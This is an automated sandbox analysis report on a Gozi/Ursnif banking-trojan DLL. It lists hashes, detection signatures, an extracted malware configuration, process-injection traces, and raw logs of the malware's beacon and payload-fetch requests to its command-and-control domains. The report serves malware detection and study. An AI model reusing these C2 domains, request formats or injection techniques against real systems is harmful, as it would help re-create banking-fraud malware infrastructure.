Analysis Report 2200.dll

Overview

General Information

Sample Name: 2200.dll
Analysis ID: 352230
MD5: e07d47927df912332bc84b3f98586091
SHA1: b55a9ae7a9ccd44dd3516e557e295e3f1cce750e
SHA256: cc849b895a0c8237f81ca3fe6395929713fb7b3f0a7744d3ddc3cb08f9f4351d
Tags: dllgoziifsb

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: regsvr32.exe.5032.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "363", "system": "d18bca24401b3a0555b04f62f946271ehh~", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1613090881", "user": "902d52678695dc15e71ab15cab4ca1f8", "hash": "0xcf6ed071", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Source: api3.lepini.at Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: 2200.dll Virustotal: Detection: 16% Perma Link
Source: 2200.dll ReversingLabs: Detection: 39%

Compliance:

barindex
Uses 32bit PE files
Source: 2200.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source: Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll
Source: Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001F7DD8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00B1E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00B2888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00B34FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B205EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00B205EF

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.185.68 104.20.185.68
Source: Joe Sandbox View IP Address: 87.248.118.23 87.248.118.23
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/DuDF5ppGssBEcEr/QV9fVntnhIoMQikVLO/d6hiSYeOV/4dYFGDJikRkXzxb_2BwW/QFQQ_2FlxfAt2qA9o9g/62AD_2B2fmm2iqEcG6vEpj/wjoFULqIWzBtE/kxblvPrR/0YVugCmN_2Bc2j9hBYYHAx9/MHnpC4iz_2/F5oIRFMeoEacrx2cV/NDVPaDtLYLzj/tmzoxSzXTF9/V0uTtxgzD_2FHy/qFYc0FBl_2Bwgx5A9auDk/zR8Z_2FGrqOtQfFe/ortBJ2feUbdJvQH/rb6hSVK_2BoVNgF7mN/65jgIEhh3/dPvzgP_2ByDfnONu1bga/xxZ9XKj_2/B3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/4ZiHzRCntPm2_2Bs_/2FRsqW01GOmk/jlSxz1SigWt/9VO23wgzmt0z6v/oeSxd8UkQmb8DtzG6cPTd/ym_2By61IoxlQY3M/yETa3aFgtQZDw09/uFg9yjZYa11Lr07gXa/S4TdWO0jq/r61swA9KHU0n7D5WiS6M/aB0_2F0q98FaVumUgko/cxT6YBLiCeGe4HDHV0QwGa/JrNDDK39RFrqA/bnSciaqC/5xKVdu46G4ukxU_2BpjItQZ/vWdcVJKKZr/8uf5Z_2FSSRnkdJI6/EcvRjJAc0DIs/MbGP9aL3I1L/I1KoMe2FXtyIq_/2Fdget5Pj/NB HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: de-ch[1].htm.4.dr String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp String found in binary or memory: :2021021220210213: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: msapplication.xml0.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 00:48:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {F336FBA0-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr, ~DF2FA3F8BD15FCAE55.TMP.3.dr String found in binary or memory: http://api10.laptok.at/api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfx
Source: explorer.exe, 00000017.00000000.856992999.000000000A9D2000.00000004.00000001.sdmp, explorer.exe, 00000017.00000000.856586501.000000000A897000.00000004.00000001.sdmp, ~DF3B3D5A4FBE860D30.TMP.3.dr, {F336FB9E-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr String found in binary or memory: http://api10.laptok.at/api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZG
Source: {F336FBA2-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr String found in binary or memory: http://api10.laptok.at/api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2Fx
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
